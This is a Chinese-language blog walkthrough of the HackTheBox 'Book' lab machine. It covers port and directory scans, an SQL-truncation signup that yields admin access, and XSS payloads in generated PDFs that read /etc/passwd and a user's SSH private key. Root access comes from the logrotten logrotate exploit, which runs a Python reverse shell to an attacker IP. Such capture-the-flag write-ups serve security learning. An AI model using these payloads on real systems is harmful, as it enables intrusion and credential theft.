文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-04-15   2.1k

HTB::Book Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • dirb
  • pspy
  • SQL Truncate
  • XSS LFI
  • logrotate exp

0x03 Pentesting

Initial Enumeration

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.80 scan initiated Fri Apr  3 22:48:24 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
| 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 3 22:49:38 2020 -- 1 IP address (1 host up) scanned in 73.80 seconds

路径扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ dirb http://10.10.10.176                                                           -----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Apr 14 02:23:14 2020
URL_BASE: http://10.10.10.176/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

----------------- GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.176/ ----
==> DIRECTORY: http://10.10.10.176/admin/
==> DIRECTORY: http://10.10.10.176/docs/
==> DIRECTORY: http://10.10.10.176/images/

+ http://10.10.10.176/index.php (CODE:200|SIZE:6800)
+ http://10.10.10.176/server-status (CODE:403|SIZE:277)

---- Entering directory: http://10.10.10.176/admin/ ----
==> DIRECTORY: http://10.10.10.176/admin/export/
+ http://10.10.10.176/admin/index.php (CODE:200|SIZE:6291)
==> DIRECTORY: http://10.10.10.176/admin/vendor/

---- Entering directory: http://10.10.10.176/docs/ ----

---- Entering directory: http://10.10.10.176/images/ ----

---- Entering directory: http://10.10.10.176/admin/export/ ----

---- Entering directory: http://10.10.10.176/admin/vendor/ ----
==> DIRECTORY: http://10.10.10.176/admin/vendor/composer/

---- Entering directory: http://10.10.10.176/admin/vendor/composer/ ----

-----------------
END_TIME: Tue Apr 14 04:45:39 2020
DOWNLOADED: 32284 - FOUND: 4

Getting User Access

查看80端口,有一个登录和注册页面,我们先正常注册和登录之后进站点看看,有三个点值得注意:

  • Contact Us界面表明了有一个管理员账号[email protected]
  • View Profile界面表明了现在账号的权限是User
  • Collections界面有一个上传功能

首先尝试能不能垂直越权,用[email protected]注册账号,Burp拦截请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /index.php HTTP/1.1
Host: 10.10.10.176
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.176/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: PHPSESSID=mq1sob5pmstq0i55csvmlafcre
Upgrade-Insecure-Requests: 1

name=admin&email=[email protected]&password=123321

并且查看注册页面源码发现email字段有JS验证

1
2
3
4
5
6
7
8
9
10
11
12
function validateForm() {
var x = document.forms["myForm"]["name"].value;
var y = document.forms["myForm"]["email"].value;
if (x == "") {
alert("Please fill name field. Should not be more than 10 characters");
return false;
}
if (y == "") {
alert("Please fill email field. Should not be more than 20 characters");
return false;
}
}

这里的越权方式:在[email protected]后面用空格填充至20个字符在加上一个任意字符,一共21个字符。

1
name=admin&email=[email protected]      C&password=123321

注册成功后,用[email protected]登录站点,发现自己的身份仍然是User,转而到http://10.10.10.176/admin页面登录,然而结果是Nope,猜测一下原因可能是因为name字段重复,再重新走一遍注册流程:

1
name=admin2&email=[email protected]      C&password=123321

登录admin站点成功。接着开始尝试Collections模块,在用户端上传一个pdf文件,内容随意

在管理面板中下载Collections PDF

可以看到刚刚上传的pdf文件

梳理一下逻辑,我们提供的数据可以呈现在pdf中,因此我们可以通过XSS提取本地文件。Google一下LFI XSS,Noob-ninja已经提供了相关的利用方式:https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html

payload:

1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

上传之后再从管理面板下载Collections PDF

成功拿到一个用户名reader,再去主目录拿SSH key

payload:

1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

但是PDF显示有问题,用pdfminner.six工具转换成text

https://github.com/pdfminer/pdfminer.six

1
$ python3 tools/pdf2text.py 68498.pdf > id_rsa

SSH reader login

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ssh -i id_rsa.txt [email protected]
The authenticity of host 'book.htb (10.10.10.176)' can't be established.
ECDSA key fingerprint is SHA256:QRw8pCXg7E8d9sWI+0Z9nZxClJiq9/eAeT/9wUfoQQk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'book.htb' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Mar 2 15:30:16 UTC 2020

System load: 0.28 Processes: 194
Usage of /: 27.1% of 19.56GB Users logged in: 1
Memory usage: 39% IP address for ens33: 10.10.10.176
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Apr 14 06:05:21 2020 from 10.10.17.235
[email protected]:~$ id
uid=1000(reader) gid=1000(reader) groups=1000(reader)
[email protected]:~$ ls
backups lse.sh user.txt

Getting Root Access

主目录下有一个backups文件夹:

1
2
3
4
5
6
7
8
9
[email protected]:~$ cd backups/
[email protected]:~/backups$ ls -la
total 12
drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 0 Jan 29 13:05 access.log
-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1
[email protected]:~/backups$ cat access.log.1
192.168.0.104 - - [29/Jun/2019:14:39:55 +0000] "GET /robbie03 HTTP/1.1" 404 446 "-" "curl"

用pspy监控靶机运行的服务:

1
2
3
4
2020/04/14 10:17:39 CMD: UID=0    PID=78202  | sleep 5 
2020/04/14 10:17:44 CMD: UID=0 PID=78205 | /usr/sbin/logrotate -f /root/log.cfg
2020/04/14 10:17:44 CMD: UID=0 PID=78204 | /bin/sh /root/log.sh
2020/04/14 10:17:44 CMD: UID=0 PID=78206 | sleep 5

如果logrotate是以root身份运行,并且普通用户对logrotate轮询的日志文件具有写的权限,那么就有一种漏洞利用可以提权。我们先来验证一下access.log是不是轮询的文件,向其中写入10M的随机比特流数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[email protected]:~/backups$ head -c 10M < /dev/urandom > access.log
[email protected]:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1
[email protected]:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader 4096 Apr 15 02:35 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 0 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log.1
-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.2

很明显,多了一个access.log.2日志文件。

从https://github.com/whotwagner/logrotten下载logrotate exploit到本机,上传至靶机的主目录并编译:

1
[email protected]:~ gcc -o logrotten logrotten.c

再准备一个payloadfile,写入reverse shell,在本机监听4444端口

1
2
[email protected]:~ cat payloadfile
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.55",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

然后执行exploit

1
2
[email protected]:~ ./logrotten -p ./payloadfile /home/reader/backups/access.log
Waiting for rotating backups/access.log...

于此同时,在另外一个终端登录靶机,向轮询日志中写入随机数据,观察主机4444端口:

1
2
3
4
5
$nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.15.152] from (UNKNOWN) [10.10.10.176] 50008
# cat /root/root.txt
84da9--------------------0dd89714

0x04 Reference

https://github.com/whotwagner/logrotten

https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf

https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html

Copyright © ca01h 2019-2020 | 本站总访问量